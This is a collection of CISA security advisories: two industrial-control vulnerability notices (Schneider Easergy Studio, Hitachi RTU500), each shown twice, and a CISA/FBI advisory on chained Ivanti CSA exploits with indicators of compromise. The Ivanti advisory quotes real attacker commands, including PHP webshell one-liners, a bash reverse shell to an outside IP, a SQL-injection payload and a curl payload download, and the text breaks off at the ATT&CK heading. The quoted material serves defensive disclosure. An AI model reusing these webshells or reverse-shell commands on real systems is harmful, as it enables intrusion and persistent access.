Author: itwadmin-security

 ​View CSAF
1. EXECUTIVE SUMMARY

CVSS v3 7.8
ATTENTION: Low attack complexity
Vendor: Schneider Electric
Equipment: Easergy Studio
Vulnerability: Improper Privilege Management

2. RISK EVALUATION
Successful exploitation of this vulnerability may risk unauthorized access to the installation directory for Easergy Studio, which could allow an attacker with access to the file system to elevate privileges.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
Schneider Electric reports that the following Easergy Studio products are affected:

Easergy Studio: Versions 9.3.1 and prior

3.2 VULNERABILITY OVERVIEW
3.2.1 IMPROPER PRIVILEGE MANAGEMENT CWE-269
An improper privilege management vulnerability exists that could cause unauthorized access, loss of confidentiality, integrity, and availability of the workstation when a non-administrative authenticated user tries to perform privilege escalation by tampering with the binaries.
CVE-2024-9002 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).
3.3 BACKGROUND

CRITICAL INFRASTRUCTURE SECTORS: Commercial Facilities, Energy, Healthcare and Public Health, Information Technology, Transportation Systems
COUNTRIES/AREAS DEPLOYED: Worldwide
COMPANY HEADQUARTERS LOCATION: France

3.4 RESEARCHER
Charit Misra (Applied Risk B.V. (a DNV Company)) reported this vulnerability to Schneider Electric.
4. MITIGATIONS
Version 9.3.4 and later of Easergy Studio includes a fix for this vulnerability. The fix was released in December 2022, and Schneider Electric recommends that users use the latest version available: https://www.se.com/ww/en/download/document/Easergy_Studio_Installer/
Schneider Electric strongly recommends the following industry cybersecurity best practices:

Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network.
Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks.
Place all controllers in locked cabinets and never leave them in the “Program” mode.
Never connect programming software to any network other than the network intended for that device.
Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks.
Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation.
Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet.
When remote access is required, use secure methods, such as virtual private networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices.

For more information refer to the Schneider Electric Recommended Cybersecurity BestPractices document and the associated Schneider Electric Security Notification SEVD-2024-282-03 in PDF and CSAF.
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:

Do not click web links or open attachments in unsolicited email messages.
Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.
5. UPDATE HISTORY

January 23, 2025: Initial Publication 

View CSAF

1. EXECUTIVE SUMMARY

• CVSS v3 7.8
• ATTENTION: Low attack complexity
• Vendor: Schneider Electric
• Equipment: Easergy Studio
• Vulnerability: Improper Privilege Management

2. RISK EVALUATION

Successful exploitation of this vulnerability may risk unauthorized access to the installation directory for Easergy Studio, which could allow an attacker with access to the file system to elevate privileges.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

Schneider Electric reports that the following Easergy Studio products are affected:

• Easergy Studio: Versions 9.3.1 and prior

3.2 VULNERABILITY OVERVIEW

3.2.1 IMPROPER PRIVILEGE MANAGEMENT CWE-269

An improper privilege management vulnerability exists that could cause unauthorized access, loss of confidentiality, integrity, and availability of the workstation when a non-administrative authenticated user tries to perform privilege escalation by tampering with the binaries.

CVE-2024-9002 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).

3.3 BACKGROUND

• CRITICAL INFRASTRUCTURE SECTORS: Commercial Facilities, Energy, Healthcare and Public Health, Information Technology, Transportation Systems
• COUNTRIES/AREAS DEPLOYED: Worldwide
• COMPANY HEADQUARTERS LOCATION: France

3.4 RESEARCHER

Charit Misra (Applied Risk B.V. (a DNV Company)) reported this vulnerability to Schneider Electric.

4. MITIGATIONS

Version 9.3.4 and later of Easergy Studio includes a fix for this vulnerability. The fix was released in December 2022, and Schneider Electric recommends that users use the latest version available: https://www.se.com/ww/en/download/document/Easergy_Studio_Installer/

Schneider Electric strongly recommends the following industry cybersecurity best practices:

• Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network.
• Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks.
• Place all controllers in locked cabinets and never leave them in the “Program” mode.
• Never connect programming software to any network other than the network intended for that device.
• Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks.
• Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation.
• Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet.
• When remote access is required, use secure methods, such as virtual private networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices.

For more information refer to the Schneider Electric Recommended Cybersecurity Best
Practices document and the associated Schneider Electric Security Notification SEVD-2024-282-03 in PDF and CSAF.

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

• Do not click web links or open attachments in unsolicited email messages.
• Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
• Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.

5. UPDATE HISTORY

• January 23, 2025: Initial Publication

 Read More

 ​View CSAF
1. EXECUTIVE SUMMARY

CVSS v3 7.2
ATTENTION: Exploitable remotely/low attack complexity
Vendor: Hitachi Energy
Equipment: RTU500 series products
Vulnerability: Improperly Implemented Security Check for Standard

2. RISK EVALUATION
Successful exploitation of this vulnerability could allow an attacker to to update the RTU500 with unsigned firmware.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
Hitachi Energy reports that the following RTU500 series products are affected:

RTU500 series CMU Firmware: Version 13.5.1 up to and including 13.5.3
RTU500 series CMU Firmware: Version 13.4.1 up to and including 13.4.4
RTU500 series CMU Firmware: Version 13.2.1 up to and including 13.2.7

3.2 VULNERABILITY OVERVIEW
3.2.1 IMPROPERLY IMPLEMENTED SECURITY CHECK FOR STANDARD CWE-358
A vulnerability exists in the RTU500 that allows for authenticated and authorized users to bypass secure update. If a malicious actor successfully exploits this vulnerability, they could use it to update the RTU500 with unsigned firmware.
CVE-2024-2617 has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).
3.3 BACKGROUND

CRITICAL INFRASTRUCTURE SECTORS: Energy
COUNTRIES/AREAS DEPLOYED: Worldwide
COMPANY HEADQUARTERS LOCATION: Switzerland

3.4 RESEARCHER
Hitachi Energy received information about this vulnerability through responsible disclosure.
4. MITIGATIONS
Hitachi Energy recommends that users update to CMU firmware version 13.6.1 and enable secure update feature on all CMUs of an RTU500.
Hitachi Energy recommends users implementing recommended security practices and firewall configurations to help protect the process control network from attacks originating from outside the network. Process control systems should be physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, and be separated from other networks by means of a firewall system with a minimal number of ports exposed. Process control systems should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system.
For more information, see Hitachi Energy Cybersecurity Advisory “Secure Update Bypass Vulnerability in Hitachi Energy’s RTU500 series Product”.
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:

Do not click web links or open attachments in unsolicited email messages.
Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.
5. UPDATE HISTORY

January 23, 2025: Initial Publication 

View CSAF

1. EXECUTIVE SUMMARY

• CVSS v3 7.2
• ATTENTION: Exploitable remotely/low attack complexity
• Vendor: Hitachi Energy
• Equipment: RTU500 series products
• Vulnerability: Improperly Implemented Security Check for Standard

2. RISK EVALUATION

Successful exploitation of this vulnerability could allow an attacker to to update the RTU500 with unsigned firmware.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

Hitachi Energy reports that the following RTU500 series products are affected:

• RTU500 series CMU Firmware: Version 13.5.1 up to and including 13.5.3
• RTU500 series CMU Firmware: Version 13.4.1 up to and including 13.4.4
• RTU500 series CMU Firmware: Version 13.2.1 up to and including 13.2.7

3.2 VULNERABILITY OVERVIEW

3.2.1 IMPROPERLY IMPLEMENTED SECURITY CHECK FOR STANDARD CWE-358

A vulnerability exists in the RTU500 that allows for authenticated and authorized users to bypass secure update. If a malicious actor successfully exploits this vulnerability, they could use it to update the RTU500 with unsigned firmware.

CVE-2024-2617 has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).

3.3 BACKGROUND

• CRITICAL INFRASTRUCTURE SECTORS: Energy
• COUNTRIES/AREAS DEPLOYED: Worldwide
• COMPANY HEADQUARTERS LOCATION: Switzerland

3.4 RESEARCHER

Hitachi Energy received information about this vulnerability through responsible disclosure.

4. MITIGATIONS

Hitachi Energy recommends that users update to CMU firmware version 13.6.1 and enable secure update feature on all CMUs of an RTU500.

Hitachi Energy recommends users implementing recommended security practices and firewall configurations to help protect the process control network from attacks originating from outside the network. Process control systems should be physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, and be separated from other networks by means of a firewall system with a minimal number of ports exposed. Process control systems should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system.

For more information, see Hitachi Energy Cybersecurity Advisory “Secure Update Bypass Vulnerability in Hitachi Energy’s RTU500 series Product”.

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

• Do not click web links or open attachments in unsolicited email messages.
• Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
• Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

5. UPDATE HISTORY

• January 23, 2025: Initial Publication

 Read More

 ​CISA, in partnership with the Federal Bureau of Investigation (FBI), released Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications. This advisory was crafted in response to active exploitation of vulnerabilities—CVE-2024-8963, an administrative bypass vulnerability; CVE-2024-9379, a SQL injection vulnerability; and CVE-2024-8190 and CVE-2024-9380, remote code execution vulnerabilities—in Ivanti Cloud Service Appliances (CSA) in September 2024.
CISA, and the use of trusted third-party incident response data, found that threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks.
CISA and FBI strongly encourage network administrators and defenders to upgrade to the latest supported version of Ivanti CSA and to hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) provided in the advisory. All members of the cybersecurity community are also encouraged to visit CISA’s Known Exploited Vulnerabilities Catalog to help better manage vulnerabilities and keep pace with threat activity. For more information and guidance on protection against the most common and impactful threats, tactics, techniques, and procedures, visit CISA’s Cross-Sector Cybersecurity Performance Goals. 

CISA, in partnership with the Federal Bureau of Investigation (FBI), released Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications. This advisory was crafted in response to active exploitation of vulnerabilities—CVE-2024-8963, an administrative bypass vulnerability; CVE-2024-9379, a SQL injection vulnerability; and CVE-2024-8190 and CVE-2024-9380, remote code execution vulnerabilities—in Ivanti Cloud Service Appliances (CSA) in September 2024.

CISA, and the use of trusted third-party incident response data, found that threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks.

CISA and FBI strongly encourage network administrators and defenders to upgrade to the latest supported version of Ivanti CSA and to hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) provided in the advisory. All members of the cybersecurity community are also encouraged to visit CISA’s Known Exploited Vulnerabilities Catalog to help better manage vulnerabilities and keep pace with threat activity. For more information and guidance on protection against the most common and impactful threats, tactics, techniques, and procedures, visit CISA’s Cross-Sector Cybersecurity Performance Goals.

 Read More

 ​Note: The CVEs in this advisory are unrelated to vulnerabilities (CVE-2025-0282 and CVE-2025-0283) in Ivanti’s Connect Secure, Policy Secure and ZTA Gateways. For more information on mitigating CVE -2025-0282 and CVE-2025-0283, see Ivanti Releases Security Updates for Connect Secure, Policy Secure, and ZTA Gateways.
Summary
The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory in response to exploitation in September 2024 of vulnerabilities in Ivanti Cloud Service Appliances (CSA): CVE-2024-8963, an administrative bypass vulnerability; CVE-2024-9379, a SQL injection vulnerability; and CVE-2024-8190 and CVE-2024-9380, remote code execution vulnerabilities.
According to CISA and trusted third-party incident response data, threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks. The actors’ primary exploit paths were two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380 and the other exploited CVE-2024-8963 and CVE-2024-9379. In one confirmed compromise, the actors moved laterally to two servers.
All four vulnerabilities affect Ivanti CSA version 4.6x versions before 519, and two of the vulnerabilities (CVE-2024-9379 and CVE-2024-9380) affect CSA versions 5.0.1 and below; according to Ivanti, these CVEs have not been exploited in version 5.0.[1]
Ivanti CSA 4.6 is End-of-Life (EOL) and no longer receives patches or third-party libraries. CISA and FBI strongly encourage network administrators to upgrade to the latest supported version of Ivanti CSA. Network defenders are encouraged to hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory. Credentials and sensitive data stored within the affected Ivanti appliances should be considered compromised. Organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory.
Download the PDF version of this report:

AA25-022A Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications
(PDF, 756.92 KB
)

For a downloadable copy of IOCs, see:

AA25-022A STIX XML
(XML, 105.56 KB
)

AA25-022A STIX JSON
(JSON, 76.91 KB
)

Technical Details
Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 16. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.
In September 2024, Ivanti released two Security Advisories disclosing exploitation of CVE-2024-8190 and CVE-2024-8963.[2][3] In October 2024, Ivanti released another advisory disclosing exploitation of CVE-2024-9379 and CVE-2024-9380.[1]

CVE-2024-8963 [CWE-22: Path Traversal] is an administrate bypass vulnerability that allows threat actors to remotely access restricted features within the appliance. When used in conjunction with CVE-2024-8190 [CWE-78: OS Command Injection], threat actors can remotely authenticate into a victims’ network and execute arbitrary commands on the appliance [T1219].[2][3]
CVE-2024-9379 [CWE-89: SQL Injection] allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements.[1]
CVE-2024-9380 [CWE-77: Command Injection] allows a remote authenticated attacker with admin privileges to obtain RCE.[1]

According to Ivanti’s advisories and industry reporting, these vulnerabilities were exploited as zero days.[4] Based on evidence of active exploitation, CISA added CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 to its Known Exploited Vulnerabilities (KEV) Catalog.
According to CISA and trusted third-party incident response data, threat actors chained the above listed vulnerabilities to gain initial access, conduct RCE, obtain credentials, and implant webshells on victim networks. The primary exploit paths included two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380. The other chain exploited CVE-2024-8963 and CVE-2024-9379. After exploitation, the actors moved laterally in one victim—other victims had no follow-on activity because they identified anomalous activity and implemented mitigation measures.
Exploit Chain 1
The threat actors leveraged CVE-2024-8963 in conjunction with remote code execution vulnerabilities, CVE-2024-8190 and CVE-2024-9380. Acting as a nobody user [T1564.002], the threat actors first sent a GET request to datetime.php to acquire session and cross-site request forgery (CSRF) tokens using GET /client/index.php%3F.php/gsb/datetime[.]php [T1071.001]. They followed this in quick succession with a POST request to the same endpoint, using the TIMEZONE input field to manipulate the setSystemTimeZone function and execute code. In some confirmed compromises, the actors used this method to run base64-encoded Python scripts that harvested encrypted admin credentials from the database [T1552.001]. Note: The actors used multiple script variations. See Appendix A for examples of encoded and decoded scripts.
In some cases, the threat actors exfiltrated the encrypted admin credentials then decrypted them offline [TA0010]. In other cases, the threat actors leveraged an executable matching the regular expression phpw{6} located in the /tmp directory to decrypt the credentials prior to exfiltration—this tool was unrecoverable.
After obtaining credentials, the actors logged in and exploited CVE-2024-9380 to execute commands from a higher privileged account. The actors successfully sent a GET request to /gsb/reports[.]php. They immediately followed this with a POST request using the TW_ID input field to execute code to implant webshells for persistence [T1505.003].
In one confirmed compromise, the threat actors tried to create webshells using two different paths:

echo “<?php system(@$_REQUEST[‘a’]);”>/opt/ivanti/csa/broker/webroot/client/help.php
echo “<?php system(‘/bin/sudo ‘. @$_REQUEST[‘a’]);” > /opt/landesk/broker/webroot/gsb/help.php

In the same compromise, the actors used the exploit to execute the following script to create a reverse Transmission Control Protocol command and control (C2) channel: bash -i >&/dev/tcp/107.173.89[.]16/8000 0>&1.
In another compromise, the threat actors maintained their presence on the victim’s system for a longer amount of time. The threat actors used sudo commands to disable the vulnerability in DateTimeTab.php, modify and remove webshells, and remove evidence of exploitation [T1548.003]. See Appendix B for the list of sudo commands used.
Lateral Movement
In one case, there was evidence of lateral movement after the threat actors gained access and established a foothold through this exploit chain. It is suspected that the threat actors gained access into a Jenkins server running a vulnerable, outdated version [T1068]. Logs on the Jenkins machine showed that a command in the bash history contained credentials to the postgres server. The threat actors then attempted to log into the Virtual Private Network (VPN) server but were unsuccessful. Prior to moving laterally, the actors likely performed discovery on the CSA device using Obelisk and GoGo to scan for vulnerabilities [T1595.002].
Exploit Chain 2
In one confirmed compromise, the actors used a similar exploit chain, exploiting CVE-2024-8963 in conjunction with CVE-2024-9379, using GET /client/index.php%3f.php/gsb/broker.php for initial access.
After the threat actors gained initial access, they attempted to exploit CVE-2024-9379 to create a webshell to gain persistent access. They executed GET and POST requests in quick succession to /client/index.php%3F.php/gsb/broker.php. In the POST body, threat actors entered the following string in the lockout attempts input box: LOCKOUTATTEMPTS = 1 ;INSERT INTO user_info(username, accessed, attempts) VALUES (”’echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>/.k”’, NOW(), 10). The first portion of the command (LOCKOUTATTEMPTS=1) fit the format of the application and was properly handled by the application. However, the second portion of the command, a SQL injection [T1190], was not properly handled by the application. Regardless, the application processed both commands, allowing the threat actors to insert a user into the user_info table.
After inserting valid bash code as a user in the user_info table, the threat actors attempted to login as the user. The authoring agencies believe the threat actors knew this login would fail but were attempting to coerce the application into handling the bash code improperly. In this attempt, the application did not evaluate the validity of the login, but instead ran echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>./k as if it were code. The threat actors repeated the process of echo commands until they built a valid web shell [T1059]. However, there were no observations that the threat actors were successful.
Detection of Activity
According to incident response data from three victim organizations, the actors were unsuccessful with follow-on activity due to the organizations’ rapid detection of the malicious activity. To remediate exploitation, all three organizations replaced the virtual machines with clean and upgraded versions.
Victim Organization 1
The first organization detected malicious activity early in the exploitation. A system administrator detected the anomalous creation of user accounts. After investigation, the organization remediated the incident. While it is likely admin credentials were exfiltrated, there were no signs of lateral movement.
Victim Organization 2
This organization had an endpoint protection platform (EPP) installed on their system that alerted when the threat actors executed base64 encoded script to create webshells. There were no indications of webshells successfully being created or of lateral movement.
Victim Organization 3
This organization leveraged the IOC findings from the other two victim sites to quickly detect malicious activity. This threat activity included the download and deployment of Obelisk and GoGo Scanner, which generated a large number of logs. The organization used these logs to identify anomalous activity.
Indicators of Compromise
See Table 1 through Table 3 for IOCs related to the threat actors’ exploitation of CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 in Ivanti CSA.
Disclaimer: Some IP addresses in this cybersecurity advisory may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.

Table 1: IP Address Used for Credential Theft, September 2024

File Name
IP Address
Description

“/client/index.php%3f.php/gsb/datetime.php
142.171.217[.]195
/var/log/messages

“/client/index.php%3f.php/gsb/datetime.php
154.64.226[.]166
/var/log/messages-20240904.gz

“/client/index.php%3f.php/gsb/datetime.php
216.131.75[.]53
 

“/client/index.php%3f.php/gsb/datetime.php
23.236.66[.]97
/var/log/messages-20240905.gz

“/client/index.php%3f.php/gsb/datetime.php
38.207.159[.]76
/var/log/messages-20240906.gz

Table 2: Survey 2, Ivanti CSA Network IOC List, September 2024

File Name
IP Address
Description

 
149.154.167[.]41
 

 
95.161.76[.]100
 

hxxps://file.io/E50vtqmJP5aa
 
 

hxxps://file.io/RBKuU8gicWt
 
 

hxxps://file.io/frdZ9L18R7Nx
 
 

hxxp://ip.sb
 
 

hxxps://pan.xj.hk/d/
6401646e701f5f47518ecef48a308a36/redis

 
 

 
142.171.217[.]195
 

 
108.174.199[.]200
 

 
206.189.156[.]69
 

 
108.174.199[.]200/Xa27efd2.tmp
 

 
142.171.217[.]195
 

Table 3: Additional IOCs Derived from Incident Response, September 2024

Type
IOC
Description

Ipv4
107.173.89[.]16
 

Ipv4
38.207.159[.]76
 

Ipv4
142.171.217[.]195
 

Ipv4
154.64.226[.]166
 

Ipv4
156.234.193[.]18
 

Ipv4
216.131.75[.]53
 

Ipv4
205.169.39[.]11
 

Ipv4
23.236.66[.]97
 

Ipv4
149.154.176[.]41
 

Ipv4
95.161.76[.]100
 

Ipv4
142.171.217[.]195
 

Ipv4
108.174.199[.]200
 

Ipv4
206.189.156[.]69
 

Ipv4
142.171.217[.]195
 

Ipv4
67.217.228[.]83
 

Ipv4
203.160.72[.]174
 

Ipv4
142.11.217[.]3
 

Ipv4
104.168.133[.]228
 

Ipv4
64.176.49[.]160
 

Ipv4
45.141.215[.]17
 

Ipv4
142.171.217[.]195
 

Ipv4
98.101.25[.]30
 

Ipv4
216.131.75[.]53
 

Ipv4
134.195.90[.]71
 

Ipv4
23.236.66[.]97
 

Hash
a50660fb31df96b3328640fdfbeea755
 

Hash
53c5b7d124f13039eb62409e1ec2089d
 

Hash
698a752ec1ca43237cb1dc791700afde
 

Hash
aa69300617faab4eb39b789ebfeb5abe
 

Hash
c2becc553b96ba27d60265d07ec3bd6c
 

Hash
cacc30e2a5b2683e19e45dc4f191cebc
/opt/ivanti/csa/broker/webroot/client/help.php

Hash
061e5946c9595e560d64d5a8c65be49e
/opt/landesk/broker/webroot/gsb/view.php

Hash

e35cf026057a3729387b7ecfb213ae
62a611f0f1a418876b11c9df3b56885bed

/tmp/brokerdebug

Hash
c7d20ca6fe596009afaeb725fec8635f
/opt/landesk/broker/webroot/gsb/help.php

Hash
F7F81AE880A17975F60E1E0FE1A4048B
/opt/landesk/broker/webroot/gsb/DateTimeTab.php

Hash
86B62FFD33597FD635E01B95F08BB996
/opt/landesk/broker/webroot/gsb/style.php

Hash
DD975310201079CACD4CDE6FACAB8C1D
/opt/landesk/broker/webroot/client/index.php

Hash
1B20E9310CA815F9E2BD366FB94E147F

/sbin/systemd  
Configuration file at /WpService.conf

Hash
30f57e14596f1bcad7cc4284d1af4684

/sbin/systemd 
Configuration file at /WpService.conf

URL
hxxps://file.io/E50vtqmJP5aa
 

URL
hxxps://file.io/RBKuU8gicWt
 

URL
hxxps://file.io/frdZ9L18R7Nx
 

URL
hxxp://ip.sb
 

URL

hxxps://pan.xj.hk/d/
6401646e701f5f47518ecef48a308a36/redis

 

URL
108.174.199.200/Xa27efd2.tmp
 

URL
45.33.101.53/log
 

URL
45.33.101.53/log2
 

URL
208.184.237.75/fdsupdate
 

URL
173.243.138.76/fdsupdate
 

URL
cri07nnrg958pkh6qhk0977u8c83jog6t.oast[.]fun
 

URL
cri07nnrg958pkh6qhk0yrgy1e76p1od6.oast[.]fun
 

domain
gg.oyr2ohrm.eyes[.]sh
 

domain
ggg.oyr2ohrm.eyes[.]sh
 

domain
gggg.oyr2ohrm.eyes[.]sh
 

domain
txt.xj[.]hk
 

domain
book.hacktricks[.]xyz
 

host
sh -c setsid /dev/shm/redis &
 

host

sh -c curl -k https://file[.]io/1zqvMYY1dpkk -o
/dev/shm/redis2

 

host
sh -c mv /dev/shm/redis2 /dev/shm/redis
 

host
sh -c rm /dev/shm/*
 

host
rm /dev/shm/PostgreSQL.1014868572 /dev/shm/redis
 

host
78cc672218949a9ec87407ad3bcb5db6
Agent.zip

host
d13f71e51b38ffef6b9dc8efbed27615
Log.log

host
d88bfac2b43509abdc70308bef75e2a6
Log.exe

host
R.exe (MD5: 60d5648d35bacf5c7aa713b2a0d267d3)
R.exe

host
ae51c891d2e895b5ca919d14edd42c26
CAService.exe

host
d88bfac2b43509abdc70308bef75e2a6
Lgfxsys.exe

host
f82847bccb621e6822a3947bc9ce9621
NetlO.cfg

host
c894f55c8fa9d92e2dd2c78172cff745
XboVFyKw.tmp

host
MD5: Unknown
Wi.bat

host
MD5: Unknown
dCUgGXfm.tmp

host
MD5: Unknown
DijZViHC.tmp

CrowdStrike Falcon
e09fef2f502a41c199046219a6584e8d
CrowdStrike falcon cid

/var/secure log
nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/ln -sf
 

/var/secure log
nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/mv /tmp/php.ini /etc/php.ini
 

/var/secure log
nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/sbin/hwclock –localtime –systohc 
 

/var/secure log
nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/subin/backuptool –fullList
 

Ipv4
142.171.217[.]195
 

Ipv4
107.173.89[.]16
 

Ipv4
192.42.116[.]210
 

Ipv4
82.197.182[.]161
 

Ipv4
154.213.185[.]230
 

Ipv4
216.131.75[.]53
 

Ipv4
23.236.66[.]97
 

Ipv4
208.105.190[.]170
 

Ipv4
136.144.17[.]145
 

Ipv4
136.144.17[.]133
 

Ipv4
216.73.162[.]56
 

Ipv4
104.28.240[.]123
 

Ipv4
163.5.171[.]49
 

Ipv4
89.187.178[.]179
 

Ipv4
163.5.171[.]49
 

Ipv4
203.160.86[.]69
 

Ipv4
185.220.69[.]83
 

Ipv4
185.199.103[.]196
 

Ipv4
188.172.229[.]15
 

Ipv4
155.138.215[.]144
 

Ipv4
64.176.49[.]160
 

Ipv4
185.40.4[.]38
 

Ipv4
216.131[.]75.53
 

Ipv4
185.40.4[.]95
 

MITRE ATT&CK Tactics and Techniques
